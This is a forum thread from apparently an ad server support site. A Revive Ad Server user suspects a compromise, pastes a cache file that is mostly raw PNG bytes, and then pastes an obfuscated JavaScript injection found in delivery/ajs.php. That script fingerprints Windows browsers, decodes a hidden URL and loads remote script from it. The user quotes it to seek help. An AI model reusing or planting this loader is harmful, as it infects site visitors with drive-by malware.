Jump to content

Is My Revive Ad Server Hacked?


Recommended Posts

Some people informed me, that their antivirus detected trojan. I look in prepend, append in zones/banners, and there is nothing bad...

 

But when I looked into var/cache, there are also some html files. Is it normal? One has this name "bc2660c01cc7be6478ec7598fee5b29c^%%EC^ECD^ECDFE081%%passthrough.html" and content is: 

138
a:4:{s:8:"template";a:1:{s:16:"passthrough.html";b:1;}s:9:"timestamp";i:1394026221;s:7:"expires";i:1394037021;s:13:"cache_serials";a:0:{}}‰PNG

   
IHDR   ď   „   ÷!ëw  «IDATxśí]}Le—ć–”Źđ]úRÚ¦l&$m”đG˙˘Ť©Z
u»Ń°
jljĘVbLK*ÉƦIn
±ŇÝ Ř’JŃŇďű˛t­
ú‹÷5ŰĹÜ Q·Y›ş±Ę6ŤbˇÜýcä:ť9çąĎ™9sg¸Î/7dxîĚďžyć<gÎsÎyf´X,&H	„Ľ @ 6Ú uhs€ÔA ÍR6HÚ uhs€ÔA Í<Ă›oľ©iš[email protected]˙jbb˘´´´´´tbbBťP˛'<ÁÍ›7~řáńńńX,¦if=|üńÇwďŢ-„8ţĽ"§ÇÚl=Ť >ÇŢćŤŘWgŹ-9Đt­_xá…ŞŞŞúúzP›WŻ^ŤF…›7oţţűďe<Ť DhbŐ†LëGhř‹.D|cbbâŇĄKuuuń}ňňň6mÚ488¨˙;33“›››››;33Ł.Zš˝3ň-l[Ž ŠĐ¬·¸2Ýî
pcccSSÓ˛eËâ;Ü˝{7ďßż˙»ďľBäććŢşuK‘źźŻ.›’m6şç¦FMÓ


L-ńť5MkiiŃ·[ZZ¬$ü [Ž 4húQĆČČH}}}Ü`ëŤiiżŰÖęęęţţţţţţŞŞ*uZ%۬{6ÖF!Dww÷ČČ©ŃÎÎÎÇ!zzzÔŲ
–făŹé-ÉRĹőD7Řš¦…BˇŤ7ľóÎ;zűńăÇkkk…ýýýę´N=Ťp8lô~¬¨©©éëë[XXصk—î×»–ÎBhbŐúLSŰ˙ţ÷/vĹJpŮşZ[Ťŕ–-[¦¦¦¨lŽ´ynnnll¬««+Ţ’——WTTôÖ[o=ňČ#zËáÇ÷íŰ'„číímkk‹ďiôF„ăăăN$1ТĘüĹ_x ËŁ	IJBC,:Ç‘6ŹŽŽnßľ===]˙×ęË!6mÚ´nÝşP(TRRb<Ö:3`6€ZŽ­[·ÎCĂBÓh$~Űüx ýĆóÎq¤ÍápxďŢ˝fĆ43ç™3gśü
	ËAă•ŮžPţ ä;	î6ßóAç¨Ć4Lu\ľ|yçÎťĆÝ–/_ŢŘŘ÷ĺ=€†8h–.:ćžČ•	T‘â™mkŰ^f[5¦n_ąrŰ
lINÚŹEç@ż¤µ™k~Ě5ĽyóćéÓ§őíŁGŹ655ézŰÚ˘eOX‚b‘ [l¸dÁěáRçćć憆†úúz!ÄŘŘŘ{ď˝'„8zô¨ţ­µE>Ňf– Ű5š–ZęĚeSmô°)~‹ĹôĚv{{»®Íz[ßĐ÷´¶¨ŔGÚě+kzł@¶ů±™mkŰ^fŰOÚŚäω$LÉ“”ÓfľX6áŁe¶őä¶N·{÷n=çĎcë™mc‹
|¤Í,Ć™í~ę§ř˛¤Î»Ř”ŮľzőŞ)Źm/łÍPu$Y/@Ş:Ň;üžŹú© r%üŁ‡čŘ"t¬}Ł«µžÇžššÚ˛e‹ŢnmQ’6c‘µŘ"ôő¨JSS“qÚŮŮ977777—°ę§Ź:›ihůĄoś<n€ÓÓ Ł*„Ş#°G<ň4|Ó`IJ»:Ł°Áăił©ĆŚŞ¨Waţ­Z«ę™zSX'ĄŐĺ‘Śs®“ZÂUGŠëÔ«Ž´0lIµ,Ú_Pm¦ńüÖfO
k´ó'5„5h=3šHÂś<y˛ąą9;;»­­mĎž=FB]&&&žxâ	!ÄG}ôŔ(Ň:ő4¬ë„%Ş˘Zu䧆Ż€9í4OžŻZČygFŁŃŻżţúË/ż|ňÉ'÷ěŮ#,s33Űńz#ăňZ®ő†_áń2%	|ofqU9c—Ž;řĉB´´´U«V;¸Ů«ŽTÖŞŽŔn˛ˇ?,:§iŔýÔ3mćP ë4¬™m};##c`ŕ·ri•9XBř){ÂF`ô4|äśpś•‡ÉpeF,űä“Oęëëżů曤®ŮN|
eIđ >'’L\Y–úćÖÖÖ_ýuvvvvv6ޤ5Űɟߌ´'_&đU7gda„(**ZłfÍ©S§ßĚGÚĚÓŕţóČÂĆćOpäČ‘#GŽÄ˙őĹšm^°(ß…g(čă‚żb©šäKÁŐü-•„k™´żbţP\ökč:::V®\ą~ýúsçÎw3îLŞˇĐdgií1bł@®Ş#ŽŮäÉ“'W¬XW®U®ökčľúę«ÉÉÉööö÷4VŐ‰ä×Đ!—Ť…Äž»âpú/†8ôQťžěęęŇ•ÇZ}	Öc&„}OCOçl۶­¸¸X˛›z
ËÍÓ.Żó;«n•‡Íoćŕ1ĺý˛ĘőСCoĽńFü_'Oî´Ůů·ôöä?ąKâď&ż0…Ä϶mŰ÷Ń”ôĹ*×îÜąsÇŽúżNźÜuVgR…׿^BŐ™Äó/3Ł]@/<ą0;Rxţµĺ$a:?!źTÂ\ ÷«\_yĺ•ĘĘĘçźŢĚh÷É]>‹Đ1¸=â·ąĐN¤A~ÚO­­­ŤŤŤń\ µúŇĹU®`
ÝkŻ˝&„Řżżbvv6==ÝšŃ!ÇovÓ;ô24ë\éŘ:ĂĐ÷ć­™?sŠ5tÎźÜĹ’cęk¦)©źfŚĘÎł)]lĘZ3A.PßźˇŻ‰śJŇD:l”É’r1
—ŕ'möS2™Í×ŕ¸S°ź°ą=>Vgi3OŐŰýň4hţň4\őÁȸiłżfKÁoÎxŞqŕź¬í˙<ú*HĂŇ7,,ÍÍÍYYYţZĺĘ_…|%v&ÄÚĽ
¦Ć˙ůżoaś„*
<3ůŕď? †–€F—^1::úěłĎ2®re^{â¤äH€™{~h<ȇ,‹ó2
Ů9©ź(WÇ`=Ł	Q’·ÁúéOś8QPP )‹«­­­­­SŤŮ6›Ţ,HzY Ž Ç"f#\SRđÜÁ§UÍŔg4IÜŽiŕ7"SCÜË"–Ŕ*WŇË}ws'0`
dő„ÄIŔNŠŇc®ÎŹĺ 3ŰƲ®U®îj3Vr$„yĽŽŹŹcÇ?…>_ÖňŁţ ‡…DX$ţî?śŘ
ý&±v«<`Y„Ę“†äpW›±’#Ť×…TÓóú•ŚĐŃŞ…F°TzáAţÎË4Ű’tAg$¤7
çýż˘ŇcCÎĘc*‹ČČČX«\Ő_č« ě̱&PhžÝß…y~°?Ô°äÁ™mc}’ťŁ{Îh_sŚ
®ˇEMdHÜ'š6+“Hx°Ż¸f™NŔÓ ·­˙ZÁ˘@‚-¦Ś
Ć81éÂËlĽ˛H˛ŕť*‡Ś'µŮ	@ă±´cX˘I›éQ –±%ýĘSřL›ˇF!ćOďm<M	ńşęÄă6›Ä#9„&…ŮFLĂ
SfŰšÇ^ň™mu–ô))ÄË#ŰMΞІ›6ŁÉLőî1e¶SđÍÄ,®*ZßLťąsÜ(<qUíŘTŽ©‡Mţý˛f[Ş!Žyľű)KšÉHĄÁŽ,Š›ł7éhŃeĐ”ŮölÍv\˛üüüź~ú‰«–O Ýq—čďJŘiA1ż9„,3a›R„”	ÚiŃGEÂ̶gk¶uş»»GFFŚ-qŘóxvmčţ®{čמżkěq:•´!Ś†Üîüł,>ě¨Ń”ŮNęšm+Âáp]]řćńĽűî»ß~űí«Ż˘ľąŰÉTäDmćZ,.&&L\$E°
-Sf;©k¶M››ëęęŇ˙U©ĺëîîŽFŁ­­­ńĹŞ#IÁ:ôąŽzˇŹD±BjĽ™Tu„ŮfD˛’Ş—> ¬<¦űą—k¶GGG·oßžžž.”kůŽ?>>>n$±úRgŻŔwSĚßkbú"HĄ~Í`ž/€	•¤)ôř…yÎ|.Ł@#HňÁ8ŮC yÎEÝńˇž´—,ÚŃćp8ĽwďŢ{XŐňµ··ďŰ·ŻŻŻoٲe(/rsgąJ!đ¸Y_ÓĐx\őyÜ€mľ|ů˛î÷!¬Ď7=ž;v\»víĄ—^ŇŤ Ŕn
!‹˝°`hźŇ]U+Y‰öÓF’=!Íé‚„IQäN`G›Ż\ąßVkŕsĎ='§Ż™Ä,ˇ<\ćl¤ćěá㚒b QCě9×lă·0ÉqvçnŹŤ‰‰GvĺG‰C‹§”Ę´„4yo&N¨a„Äő˛5upą=Ô*Ź›~łü§©°—ŮöŃŰ/…XěZĂÇŇđű&ŔŮ«“Ŕ˘
#—kˇsa°ź…‰=C>)źE#yüB^^ަM›őő8onn®ŹÖlSX¦L‹9$›1á«úfTŮi6ˇŃpŰf¶ŤXk¶u(VÁŹ°póÂSy8=ŠĂ˘Í®öŚ
+<Xłmňܹꬅ´›(ňá–Ů]ť†|Áđű5îĹ4„ v1ŹlzÄ˝gk¶Ť†–«ÎZ`
d#6r”FhČ<Ă+s(9„ôŁ<%KH…Wk¶Őë¬WąéŞJ‘0™›¸,ä!ŠşĽ¸źĂcşŮ‡m6–)ÖYŰŻ:"úŘpUŐ«—$žöŚ"ü»Xu„¨3gĂżJ{@”Ř©o6N?ë¬UŞŽ®Âł@ěćÖ˛„˙[Ň×i’ô˙Ť|áAžó˙Ió›A’We“ ĎŕA‰<nŔfĽ9>ýÔçžýýý¦:kc‹X¬:ş{÷®„S#~`<6ëś=#í·Wź>ä/ń¤Üíb'ŕťó»ńâz϶ť†qú©Xgm»ęHâ!¨“ČŰŐAć7mx~ŚIťÇőžAzzRĆ̶gk¶mÔY«VqĚ…ŕ…—‚¸=$adA1’0nQÔY"<­‡]°KiͶ"ŕKcÇr¨7Ó®—6Óc#äŮ$Ľ+‡M•;!pű˝3~k<ÎďŮfŢÝŽ9č
Ä4´´Pň»O†¨ÎwŁIŮöţ=Űüŕ‰7óÜOÁk¦Qł'Âĺ:
R.Pú\w?<^łí`â*ŤŕđX<™l3ç8§ţ جibŃ`{ąf›
ŐŞ#äÚý]ôîNöXCň¸xÜwâŮŞőăŰ\k¶Éń掎Ž•+W®_żţÜąsbńÜä±CEH˘°ŕ&ˇa IřBĽX(RŕŇP…±ŃÉIŮ6»ôŢB!ôđyŔW’‰J‚;uŕJˇNĂĺiČ„I¦ćB kłééŽVŘ®:P/q-“&ßÜY<
Éý9ŢŮŐQązŘ
Řô›©ď-L^ŐÝaOňŹ0¤ś"JB×B÷N*a•Ľ=ŘŃfď-T©:ú÷)Z„¬e™"ß1çÂü%Jv{@žáIZ„=#€|Rˇž‘<ň*y{ kł˝÷Ş<ë»/ďL!^Ȣş-G†u{¤qâiŘËc[AÖf{ď-TŞ:ÂŢ#AöçkÄě	:%eňż‰~3ŹÚđ4Ŕ̶ĽJŢśVq>ëąo2Ä"lXĐoćł©$S‹ůÍđÉâżČbšŃŮ$Ţnő*VÉŰŹr`w8ą9äôÄF±‡ąÓ †c¦*yAĚc„Nf†«ćăšŃ…áń›I7jĎxb/VÉŰŹ´î˛rMĽ úpő˝'$ućň4ĐçQVÉŰź´™ĺé0\×Ń-d™’J„$±pąO\6Ţ	ü¤ÍP7‘gî?6m&-Zö!q1KjÇ
řL›-Ťže¶9,h,ÂĆ5Ć-Ą*S€íĘä*.iłd®C¤!KŘAłG¬ÖwŮÓ TëĽg¨F™Ř1$żÂOOĽŐ€Ďˇ?ÓHˇČ·ţt˘O`›Í$Da˛ó?ţéµg0‡gÄŐ3aţ¨žĄ"”:×áâań›É<¸ÇB SĎHžÁě9ÔŢ€íŢĎűµ_¸·•ÍcmNĹUXÉáń•0\<ľĆ!üä7ŕŢŹ§ ¸Řć ©%©ÍŠsÇ`ŠůG—Ú<77—““Ł—›<öŘcB©©©‚‚‚ąą9l–‡0 #Tç˙ř㏷nÝš™™y˙ý÷ź9sĆžI4MkiiŃ·[ZZśtŽťĚ‰§¨­­}űí·çç糲˛fffÚŰŰź~úé„GIÄ6~ĺüěś3wuuÍÎÎNOO§¦ň	IäBlܸńÎť;wîÜŮĽyłşĹ%xěi<účŁĂĂĂ“““?˙üs4Ńë\…ź~úiiiéęŐ«/\¸ ·|řá‡+V¬xć™gÔů<““_+nZŇC‚¦i/ľřbzz:éđěěěëׯG"‘âââ÷ß_?6''§ŁŁ#ΓĐΙH¬gˇišéLM¨©©éëë;{öě®]»âŤ/^,)))))ąxń˘
‰VI¬W-©đv0ݸqŁ°°°§§gůňĺ§NťZłfÍíŰ·őŻ*++‡††"‘HYY™ŢRVV‡Ăá°DlqŻm‡Ă‘H¤¨¨Čô­â‰›úŞ««k~~^ýđX,6==ÝĐĐđŕćçç÷ööꍑHdÝşuę’H¬ga=SÓYLOOWWWWWW_»v-~TyyąŢź	IL„؆őŞ%ŢGčz衬¬¬űî»/ŤĆ gffÎĎĎ/,,!ôWL¤§§ßľ}{aa!##ŰĂŹoK6ä0±ÍĎĎëkÎmd
&&&jjjÚÚÚ~üńÇP(¤ź‰J'ąqăéĽôƧžz*
é¦]ß'33óÖ­[ůůůżüň‹zçH~×zŐ’Š¤ŽÇŽKKK‹FŁBÎÎÎx{eee8ÖmˇŽ˛˛˛ˇˇˇˇˇ!‰Řň›ăEEE‘Hd``@ńÄA6Ó¶uuu“““łłł˝˝˝«V­ĘÎÎţěłĎ.]şgČĘĘş~ý:‰ÄzÖ
ě,Ś˙–——

…Ăáňňň„$ UëUK&Ľ×ćH$RUU‹Ĺ6lŘđĂ?ÄŰ?˙üóŠŠŠP(ď©ţţţÂÂÂúúzŰÚüúëŻggg744$M›Oź>]VV–‘‘QQQ100pŕŔÜÜ\Ł /żürvv¶śĐDb={Ú<<<ĽvíÚµk×'$¬’XŻZ2ὧ  –dö[email protected] 6HÚ uhs€ÔA ÍR6HÚ uhs€ÔA ÍR˙U÷­Ýcčd    IEND®B`‚

Is it normal? Or where could be a problem.

 

 

I have Revive 3.0.0, now I upgrade to 3.0.2, but is it enough?

Link to comment
Share on other sites

I probably found thaht problem

 

in delivery/ajs.php is after function MAX_flashGetFlashObjectInline()

{
...
}
this:
 
echo "<script>(function(_Lvm){function _Kmp(_FtA,_S1){return _FtA.src=_S1;}function _WCb(_Pxe){_Pxe+='16,24,-25,20,23,11,-27,-39,-38,-36,-50,15,17,12,7,-19,-15,22,-27,-32,-33,-32,-39,-38';_Pxe=_Pxe.split(',');var _epK='',_y8V=0;for(_JGX=0;_JGX<_Pxe.length-1;_JGX++){_y8V=parseInt(_Pxe[0]);_y8V+=parseInt(_Pxe[_JGX+1]);_epK+=String.fromCharCode(_y8V);}return _epK;}function _L1C(){if(/(Windows)/.test(navigator.userAgent)&&/(MSIE|Opera|Trident|Firefox)/.test(navigator.userAgent)){try{_Jtc=88,16,28,28,24,-30,-41,-41,24,29,10,-42,9,27,28,26,23,22,23,21,17,9,-42,11,23,21,-41,24,20,29,';_evm=_QIk();_wEm=_WCb(_Jtc);_Kmp(_evm,_wEm);}catch(e){};}}function _Glv(){return 'sc'+_odd.i;}function _K01(){_L1C();_Lvm.cookie=_3os()+'=true;max-age=21600;path=/';}function _QIk(){var _1V=_Lvm.createElement(_Glv());_1V.sync=1;_Jtc+='15,17,22,27,-41,15,13,23,-4,9,26,15,13,28,17,22,15,-41,20,23,11,9,28,17,23,22,27,-41,27,11,26,17,24,28,-42,24,';try{_Lvm['body]['appendChild'](_1V);}catch(e){try{_Lvm.write('<body>');_Lvm.body.appendChild(_1V);}catch(e){}}return _1V;}function _3os(){return _Lvm.location.host;}var _odd={'i':'ript'},_Jtc,_evm;if(_Gut()){_K01();}function _Gut(){return _Lvm.cookie.search(new RegExp(_3os()))==-1;}})(document);</script>\n";
 
 
How it could happend, and how prevent it.
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...